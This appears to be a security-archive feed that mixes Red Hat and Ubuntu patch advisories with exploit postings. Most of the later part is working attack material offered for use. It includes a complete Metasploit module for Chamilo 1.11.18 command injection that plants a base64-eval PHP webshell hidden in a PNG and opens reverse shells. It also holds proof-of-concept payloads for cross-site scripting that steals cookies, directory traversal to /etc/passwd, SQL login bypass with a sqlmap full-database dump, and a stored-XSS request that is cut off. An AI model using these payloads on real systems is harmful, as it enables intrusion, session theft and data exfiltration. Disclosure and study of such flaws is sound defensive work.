Red Hat Security Advisory 2023-4720-01 - Red Hat Middleware for OpenShift provides images for many of the Red Hat Middleware products for use within the OpenShift Container Platform cloud computing Platform-as-a-Service for on-premise or private cloud deployments. This release of the AMQ Broker 7.11.1 aligned Operator includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: AMQ Broker 7.11.1.OPR.2.GA Container Images Release  
Advisory ID:       RHSA-2023:4720-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4720  
Issue date:        2023-08-23  
CVE Names:         CVE-2020-24736 CVE-2023-1667 CVE-2023-2283  
                   CVE-2023-2602 CVE-2023-2603 CVE-2023-4065  
                   CVE-2023-4066 CVE-2023-26604 CVE-2023-27536  
                   CVE-2023-28321 CVE-2023-28484 CVE-2023-29469  
                   CVE-2023-32681 CVE-2023-34969  
====================================================================  
1. Summary:

This is the multiarch release of the AMQ Broker 7.11.1 aligned Operator and  
associated container images on Red Hat Enterprise Linux 8 for the OpenShift  
Container Platform.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

Red Hat Middleware for OpenShift provides images for many of the Red Hat  
Middleware products for use within the OpenShift Container Platform cloud  
computing Platform-as-a-Service (PaaS) for on-premise or private cloud  
deployments.

This release of the AMQ Broker 7.11.1 aligned Operator includes security  
and bug fixes, and enhancements. For further information, refer to the  
release notes linked to in the References section.

Security Fix(es):

* amq-broker-operator-container: Red Hat AMQ Broker Operator: plaintext  
password in operator log (CVE-2023-4065)

* activemq-broker-operator: Red Hat AMQ Broker Operator: Passwords defined  
in secrets shown in StatefulSet yaml (CVE-2023-4066)

For more details about the security issue(s), including the impact, a CVSS  
score, and other related information, refer to the CVE page(s) listed in  
the References section.

For information on supported configurations, see Red Hat AMQ Broker 7  
Supported Configurations at https://access.redhat.com/articles/2791941

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2224630 - CVE-2023-4065 Red Hat AMQ Broker Operator: plaintext password in operator log  
2224677 - CVE-2023-4066 Red Hat AMQ Broker Operator: Passwords defined in secrets shown in StatefulSet yaml

5. JIRA issues fixed (https://issues.redhat.com/):

ENTMQBR-7804 - Move json dumps for Openshift objects into Debug from INFO loglevel

6. References:

https://access.redhat.com/security/cve/CVE-2020-24736  
https://access.redhat.com/security/cve/CVE-2023-1667  
https://access.redhat.com/security/cve/CVE-2023-2283  
https://access.redhat.com/security/cve/CVE-2023-2602  
https://access.redhat.com/security/cve/CVE-2023-2603  
https://access.redhat.com/security/cve/CVE-2023-4065  
https://access.redhat.com/security/cve/CVE-2023-4066  
https://access.redhat.com/security/cve/CVE-2023-26604  
https://access.redhat.com/security/cve/CVE-2023-27536  
https://access.redhat.com/security/cve/CVE-2023-28321  
https://access.redhat.com/security/cve/CVE-2023-28484  
https://access.redhat.com/security/cve/CVE-2023-29469  
https://access.redhat.com/security/cve/CVE-2023-32681  
https://access.redhat.com/security/cve/CVE-2023-34969  
https://access.redhat.com/security/updates/classification/#moderate  
https://access.redhat.com/documentation/en-us/red_hat_amq_broker/

7. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5nCIAAoJENzjgjWX9erEpDoP/3aD3YllQ8QZQtrzg0PUfOql  
ElVQW456eRzOAuD44axM2ShM2WbkXOxl9z3HcxqpO9iyOvAFTXBnWib6Rjc/OVuZ  
5cj/v0AaZ0xJbHzKELpLZqHAMh24B4cVd0PZ41QM9i4bTomSihX+W035U/gnnJuT  
CjQvaNY1MoZVUK7J5eIhCurSQtH7jLYi7VXCtkViaTifu0fw63NKKvm3hwm7mmSG  
ADWCoyZFl+6VsPmjbFfOCLEjs3/yjsPctFfmAFTEwKZTHZONLzIQCLA0BR3czwU7  
9fGD+UNzJ4nobelP7Tjd3IIv+G2WM+u97Da0vS7/3DBSeETYABcpM74ftyoOG1pg  
B+wcMxzAid0iWrIbiFZkxg5xatjTs8I3hw3n1/n4hgTbz7vauy5cLJ4963RBAQEh  
VQW2A+xh0XUOY9kY/6kHPjx5b6CqfhS9JG2fxRCFPuJGl0uNEzGEztc1yCjt0Yw8  
eeLhI6XCkwzcPLiHMpx/7uMMzlk2Kh74DHg4x1h3pYreUbf7ppjY2YoSWuGJlddu  
5ehMmtfV+8310htygdIfnt3HyP+nBqir9ptwXf4L5afeNdkIzZCLuy0A6/AaKOUJ  
8rfRSmBc+JTessL5+BOMCccQFdf7HDCD4CckGaKjDRWAXUzzpEtXV9/0wryh7mmf  
7TDWMk48Klzq3qHxZN7A  
=eJ9v  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4720-01

Red Hat Security Advisory 2023-4674-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.30.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.12.30 packages and security update  
Advisory ID:       RHSA-2023:4674-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4674  
Issue date:        2023-08-23  
CVE Names:         CVE-2022-27664  
====================================================================  
1. Summary:

Red Hat OpenShift Container Platform release 4.12.30 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.12.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.12 - aarch64, ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.12.30. See the following advisory for the container images for  
this release:

https://access.redhat.com/errata/RHSA-2023:4671

Security Fix(es):

* golang: net/http: handle server errors after sending GOAWAY  
(CVE-2022-27664)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift CLI (oc)  
or web console. Instructions for upgrading a cluster are available at  
https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.12 see the following documentation,  
which will be updated shortly for this release, for important instructions  
on how to upgrade your cluster and fully apply this asynchronous errata  
update:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY

6. Package List:

Red Hat OpenShift Container Platform 4.12:

Source:  
cri-o-1.25.4-4.rhaos4.12.gitb9319a2.el8.src.rpm  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el8.src.rpm

aarch64:  
cri-o-1.25.4-4.rhaos4.12.gitb9319a2.el8.aarch64.rpm  
cri-o-debuginfo-1.25.4-4.rhaos4.12.gitb9319a2.el8.aarch64.rpm  
cri-o-debugsource-1.25.4-4.rhaos4.12.gitb9319a2.el8.aarch64.rpm  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el8.aarch64.rpm

ppc64le:  
cri-o-1.25.4-4.rhaos4.12.gitb9319a2.el8.ppc64le.rpm  
cri-o-debuginfo-1.25.4-4.rhaos4.12.gitb9319a2.el8.ppc64le.rpm  
cri-o-debugsource-1.25.4-4.rhaos4.12.gitb9319a2.el8.ppc64le.rpm  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el8.ppc64le.rpm

s390x:  
cri-o-1.25.4-4.rhaos4.12.gitb9319a2.el8.s390x.rpm  
cri-o-debuginfo-1.25.4-4.rhaos4.12.gitb9319a2.el8.s390x.rpm  
cri-o-debugsource-1.25.4-4.rhaos4.12.gitb9319a2.el8.s390x.rpm  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el8.s390x.rpm

x86_64:  
cri-o-1.25.4-4.rhaos4.12.gitb9319a2.el8.x86_64.rpm  
cri-o-debuginfo-1.25.4-4.rhaos4.12.gitb9319a2.el8.x86_64.rpm  
cri-o-debugsource-1.25.4-4.rhaos4.12.gitb9319a2.el8.x86_64.rpm  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el8.x86_64.rpm  
openshift-clients-redistributable-4.12.0-202308151125.p0.gf61957e.assembly.stream.el8.x86_64.rpm

Red Hat OpenShift Container Platform 4.12:

Source:  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el9.src.rpm

aarch64:  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el9.aarch64.rpm

ppc64le:  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el9.ppc64le.rpm

s390x:  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el9.s390x.rpm

x86_64:  
openshift-clients-4.12.0-202308151125.p0.gf61957e.assembly.stream.el9.x86_64.rpm  
openshift-clients-redistributable-4.12.0-202308151125.p0.gf61957e.assembly.stream.el9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/updates/classification/#moderate  
https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJk5nCbAAoJENzjgjWX9erEpc0P/1+iF4XNpzS6djOacDQoIDps  
7ChiCnOn/6WuLeuXTpAPugngaaYDeK9Zdmbi9SOgq9OL+iVUJd9XsMGCShb1hHZJ  
6NquTZbjI55WrVI192A8TakFjCu1jOgpb4BjpWODMQ+G8uVs6P0DvNdxjiApQioy  
rjglbitP0QsEWmLPNzcYVJsTfqrySTzo6HQVg15MP9MlDf/pRzWtIgFrb0ZKqVyk  
LDwYXEta7ngz+C3yJpdE6kpV+U+k4VqEJzUeeooclDt9EK8W+fjfQydQ5ynHTUKJ  
5plSHbonr9J0v/KGGK+CCSAM3oV3/11t1gLMsckFnco0X5cApaeqaBTqIgN1Sprc  
a3NfpJWxR7e94l4SljOPlnMvFs9qh1TFWBPl163EEyeYCSBSAfd7dZGFTW4wf0dn  
/DDwpGclvTezU/xkJLjqcyfJlM0Jiendt9BHUZbRL2bh03Hc+f94SZEl2IOsRN5D  
DV75avEWLBWwcKaQ8bJLwkFeG6759jOx8GhOV5Hsxiwo41OQbEFgoZg3QMabX6aU  
iKKmp3u24YQ65osakIC17J79WuRKu9WSpucUXZpoiTylnHpi/4UcYTMYjOtf4ELH  
iDcd5jwFe7bWWGPQlgsw+KhQXVVy4kDwDbyYeOreqBOqJnLeqatfNI2f1D7fCJDp  
B3TcRpIruZnY7370tddX  
=xepm  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4674-01

Ubuntu Security Notice 6305-1 - It was discovered that PHP incorrectly handled certain XML files. An attacker could possibly use this issue to expose sensitive information. It was discovered that PHP incorrectly handled certain PHAR files. An attacker could possibly use this issue to cause a crash, expose sensitive information or execute arbitrary code.

=========================================================================  
Ubuntu Security Notice USN-6305-1  
August 23, 2023

php8.1 vulnerabilities  
=========================================================================  
A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.04 LTS

Summary:

Several security issues were fixed in PHP.

Software Description:  
- php8.1: HTML-embedded scripting language interpreter

Details:

It was discovered that PHP incorrectly handled certain XML files.  
An attacker could possibly use this issue to expose sensitive information.  
(CVE-2023-3823)

It was discovered that PHP incorrectly handled certain PHAR files.  
An attacker could possibly use this issue to cause a crash,  
expose sensitive information or execute arbitrary code.  
(CVE-2023-3824)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  libapache2-mod-php8.1           8.1.12-1ubuntu4.3  
  php8.1                          8.1.12-1ubuntu4.3  
  php8.1-cgi                      8.1.12-1ubuntu4.3  
  php8.1-cli                      8.1.12-1ubuntu4.3  
  php8.1-fpm                      8.1.12-1ubuntu4.3  
  php8.1-xml                      8.1.12-1ubuntu4.3

Ubuntu 22.04 LTS:  
  libapache2-mod-php8.1           8.1.2-1ubuntu2.14  
  php8.1                          8.1.2-1ubuntu2.14  
  php8.1-cgi                      8.1.2-1ubuntu2.14  
  php8.1-cli                      8.1.2-1ubuntu2.14  
  php8.1-fpm                      8.1.2-1ubuntu2.14  
  php8.1-xml                      8.1.2-1ubuntu2.14

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6305-1  
  CVE-2023-3823, CVE-2023-3824

Package Information:  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.12-1ubuntu4.3  
  https://launchpad.net/ubuntu/+source/php8.1/8.1.2-1ubuntu2.14

Ubuntu Security Notice USN-6305-1

This Metasploit module exploits an unauthenticated remote command execution vulnerability that affects Chamilo versions 1.11.18 and below. Due to a functionality called Chamilo Rapid to easily convert PowerPoint slides to courses on Chamilo, it is possible for an unauthenticated remote attacker to execute arbitrary commands at the OS level using a malicious SOAP request at the vulnerable endpoint /main/webservices/additional_webservices.php.

    # This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-frameworkclass MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  include Msf::Exploit::Format::PhpPayloadPng  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Chamilo unauthenticated command injection in PowerPoint upload',        'Description' => %q{          Chamilo is an e-learning platform, also called Learning Management Systems (LMS).          This module exploits an unauthenticated remote command execution vulnerability          that affects Chamilo versions `1.11.18` and below (CVE-2023-34960).          Due to a functionality called Chamilo Rapid to easily convert PowerPoint          slides to courses on Chamilo, it is possible for an unauthenticated remote          attacker to execute arbitrary commands at OS level using a malicious SOAP          request at the vulnerable endpoint `/main/webservices/additional_webservices.php`.        },        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # Module Author          'Randorisec' # Original research        ],        'References' => [          ['CVE', '2023-34960'],          ['URL', 'https://www.randorisec.fr/pt/chamilo-1.11.18-multiple-vulnerabilities'],          ['URL', 'https://attackerkb.com/topics/VVJpMeSpUP/cve-2023-34960']        ],        'License' => MSF_LICENSE,        'Platform' => ['php', 'unix', 'linux'],        'Privileged' => false,        'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_AARCH64],        'Targets' => [          [            'PHP',            {              'Platform' => 'php',              'Arch' => ARCH_PHP,              'Type' => :php,              'DefaultOptions' => {                'PAYLOAD' => 'php/meterpreter/reverse_tcp'              }            }          ],          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_bash'              }            }          ],          [            'Linux Dropper',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64, ARCH_X86, ARCH_AARCH64],              'Type' => :linux_dropper,              'Linemax' => 65535,              'CmdStagerFlavor' => ['wget', 'curl'],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2023-06-01',        'DefaultOptions' => {          'SSL' => false,          'RPORT' => 80        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options([      OptString.new('TARGETURI', [ true, 'The Chamilo endpoint URL', '/' ]),      OptString.new('WEBSHELL', [        false, 'The name of the webshell with extension. Webshell name will be randomly generated if left unset.', nil      ], conditions: %w[TARGET == 0])    ])  end  def soap_request(cmd)    # create SOAP request exploiting CVE-2023-34960    # Randomize ppt size    ppt_size = "#{rand(720..1440)}x#{rand(360..720)}"    return <<~EOS      <?xml version="1.0" encoding="UTF-8"?>      <SOAP-ENV:Envelope        xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"        xmlns:ns1="#{target_uri.path}"        xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"        xmlns:xsd="http://www.w3.org/2001/XMLSchema"        xmlns:ns2="http://xml.apache.org/xml-soap"        xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"        SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">        <SOAP-ENV:Body>          <ns1:wsConvertPpt>            <param0 xsi:type="ns2:Map">              <item>                <key xsi:type="xsd:string">file_data</key>                <value xsi:type="xsd:string"></value>              </item>              <item>                <key xsi:type="xsd:string">file_name</key>                <value xsi:type="xsd:string">`{{}}`.pptx'|" |#{cmd}||a #</value>              </item>              <item>                <key xsi:type="xsd:string">service_ppt2lp_size</key>                <value xsi:type="xsd:string">#{ppt_size}</value>              </item>            </param0>          </ns1:wsConvertPpt>        </SOAP-ENV:Body>      </SOAP-ENV:Envelope>    EOS  end  def upload_webshell    # randomize file name if option WEBSHELL is not set    @webshell_name = if datastore['WEBSHELL'].blank?                       "#{Rex::Text.rand_text_alpha(8..16)}.php"                     else                       datastore['WEBSHELL'].to_s                     end    @post_param = Rex::Text.rand_text_alphanumeric(1..8)    # inject PHP payload into the PLTE chunk of a PNG image to hide the payload    php_payload = "<?php @eval(base64_decode($_POST[\'#{@post_param}\']));?>"    png_webshell = inject_php_payload_png(php_payload, injection_method: 'PLTE')    return nil if png_webshell.nil?    # encode webshell data and write to file on the target for execution    payload = Base64.strict_encode64(png_webshell.to_s)    cmd = "echo #{payload}|openssl enc -a -d > ./#{@webshell_name}"    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),      'ctype' => 'text/xml; charset=utf-8',      'data' => soap_request(cmd).to_s    })  end  def execute_php(cmd, _opts = {})    payload = Base64.strict_encode64(cmd)    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'main', 'inc', 'lib', 'ppt2png', @webshell_name),      'ctype' => 'application/x-www-form-urlencoded',      'vars_post' => {        @post_param => payload      }    })  end  def execute_command(cmd, _opts = {})    # Encode payload with base64 and decode with openssl (most common installed on unix systems)    payload = Base64.strict_encode64(cmd)    cmd = "echo #{payload}|openssl enc -a -d|sh"    return send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'main', 'webservices', 'additional_webservices.php'),      'ctype' => 'text/xml; charset=utf-8',      'data' => soap_request(cmd).to_s    })  end  def check    # Checking if the target is vulnerable by echoing a randomised marker that will return the marker in the response.    print_status("Checking if #{peer} can be exploited.")    marker = Rex::Text.rand_text_alphanumeric(8..16)    res = execute_command("echo #{marker}")    if res && res.code == 200 && res.body.include?('wsConvertPptResponse') && res.body.include?(marker)      CheckCode::Vulnerable    else      CheckCode::Safe('No valid response received from the target.')    end  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :php      res = upload_webshell      fail_with(Failure::PayloadFailed, 'Web shell upload error.') unless res && res.code == 200 && res.body.include?('wsConvertPptResponse')      register_file_for_cleanup(@webshell_name.to_s)      execute_php(payload.encoded)    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager({ linemax: target.opts['Linemax'] })    end  endend

Chamilo 1.11.18 Command Injection

GEN Security+ version 4.0 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : GEN Security+ v4.0 XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.ptcpay.com/                                                                                            || # Dork      : Powered by GeN4 Security+ 2.0                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Us3 P@yL04D: GEN/forum/search.php?a=1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&q=1&Submit=1[+] http://127.0.0.1/GEN/forum/search.php?a=1%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3E&q=1&Submit=1Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

GEN Security+ 4.0 Cross Site Scripting

Geeklog version 2.1.0b1 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : Geeklog v2.1.0b1 Sql Injection Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://www.geeklog.net/                                                                                            || # Dork      : Powered by Geeklog                                                                                                 |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine.[+]  use Payload : calendar/index.php?view=day&day=05&month=10&year=2014 [+]  http://127.0.0.1/public_html/calendar/index.php?view=day&day=05&month=10&year=2014 (inject her)[+]  login : http://127.0.0.1/public_html/admin Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

Geeklog 2.1.0b1 SQL Injection

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

**GraceHRM 1.0.3 Directory Traversal**

Posted Aug 24, 2023

Authored by indoushka

GraceHRM version 1.0.3 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 1ef7aca42ba692fa60907a0530d21ee9db579bba9acd7d508271bcf4d6e8171a

Download | Favorite | View

**GraceHRM 1.0.3 Directory Traversal**

    ====================================================================================================================================| # Title     : GraceHRM v1.0.3 Directory traversal Vulnerability                                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://p30vel.ir/                                                                                                  |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /admin/download?type=files&filename=../../../../../../../../../etc/passwd[+] http://127.0.0.1/hrmgraceitltdcom/admin/download?type=files&filename=../../../../../../../../../etc/passwdGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (82,010)
*   Arbitrary (16,214)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,282)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,348)
*   DoS (23,453)
*   Encryption (2,370)
*   Exploit (51,962)
*   File Inclusion (4,223)
*   File Upload (976)
*   Firewall (821)
*   Info Disclosure (2,785)
*   Intrusion Detection (892)
*   Java (3,045)
*   JavaScript (859)
*   Kernel (6,681)
*   Local (14,456)
*   Magazine (586)
*   Overflow (12,693)
*   Perl (1,423)
*   PHP (5,149)
*   Proof of Concept (2,338)
*   Protocol (3,603)
*   Python (1,535)
*   Remote (30,803)
*   Root (3,587)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,640)
*   Security Tool (7,889)
*   Shell (3,187)
*   Shellcode (1,215)
*   Sniffer (895)
*   Spoof (2,207)
*   SQL Injection (16,385)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (665)
*   Vulnerability (31,788)
*   Web (9,670)
*   Whitepaper (3,750)
*   x86 (962)
*   XSS (17,956)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,925)
*   Debian (6,819)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,508)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,753)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,836)
*   UNIX (9,292)
*   UnixWare (186)
*   Windows (6,575)
*   Other

GraceHRM 1.0.3 Directory Traversal

User Registration and Login and User Management System version 3.0 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: User Registration & Login and User Management System v3.0 - Stored Cross-Site Scripting (XSS)# Google Dork: NA# Date: 19/08/2023# Exploit Author: Ashutosh Singh Umath# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/# Version: 3.0# Tested on: Windows 11# CVE : RequestedDescriptionUser Registration & Login and User Management System With admin panel 3.0 application from PHPgurukul is vulnerable toPersistent XSS via the fname, lname, email, and contact field name. When User logs in or the admin user logs in the payload gets executed.POCUser side1. Go to the user registration page http://localhost/loginsystem.2. Enter <img src="x" onerror=alert(document.cookie)> in one of thefields (first name, last name, email, or contact).3. Click sign up.Admin side1. Login to admin panel http://localhost/loginsystem/admin.2. After login successfully go to manage user page.3. PayloadThanks and Regards,Ashutosh Singh Umath

User Registration And Login And User Management System 3.0 Cross Site Scripting

User Registration and Login and User Management System version 3.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: User Registration & Login and User Management System v3.0 - SQL Injection (Unauthenticated)# Google Dork: NA# Date: 19/08/2023# Exploit Author: Ashutosh Singh Umath# Vendor Homepage: https://phpgurukul.com# Software Link:https://phpgurukul.com/user-registration-login-and-user-management-system-with-admin-panel/# Version: 3.0# Tested on: Windows 11# CVE : RequestedProof Of Concept:1. Navigate to the admin login page.URL: http://192.168.1.5/loginsystem/admin/2. Enter "*admin' -- -*" in the admin username field and anythingrandom in the password field.3. Now you successfully logged in as admin.4. To download all the data from the database, use the below commands.  4.1. Login to the admin portal and capture the request.  4.2. Copy the intercepted request in a file.  4.3. Now use the below command to dump all the dataCommand:  sqlmap -r <file-name> -p username -D loginsystem --dump-allThanks and Regards,Ashutosh Singh Umath

User Registration And Login And User Management System 3.0 SQL Injection

Uvdesk version 1.1.4 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Uvdesk 1.1.4 - Stored XSS (Authenticated)# Date: 14/08/2023# Exploit Author: Hubert Wojciechowski# Contact Author: hub.woj12345@gmail.com# Vendor Homepage: https://www.uvdesk.com/# Software Link: https://github.com/MegaTKC/AeroCMS# Version: 1.1.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23# Authenticated user privilages to tickets. User can send XSS to admin or other user and stolen sesssion.## Example XSS Stored in new ticket-----------------------------------------------------------------------------------------------------------------------Param: reply-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------POST /uvdesk/public/en/member/thread/add/1 HTTP/1.1Host: 127.0.0.1Content-Length: 812Cache-Control: max-age=0sec-ch-ua: sec-ch-ua-mobile: ?0sec-ch-ua-platform: ""Upgrade-Insecure-Requests: 1Origin: http://127.0.0.1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXCjJcGbgZxZWLsSkUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://127.0.0.1/uvdesk/public/en/member/ticket/view/1Accept-Encoding: gzip, deflateAccept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7Cookie: uv-sidebar=0; PHPSESSID=4b0j3r934245lpssq5lil3edm3Connection: close------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="threadType"forward------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; name="status"------WebKitFormBoundaryXCjJcGbgZxZWLsSkContent-Disposition: form-data; 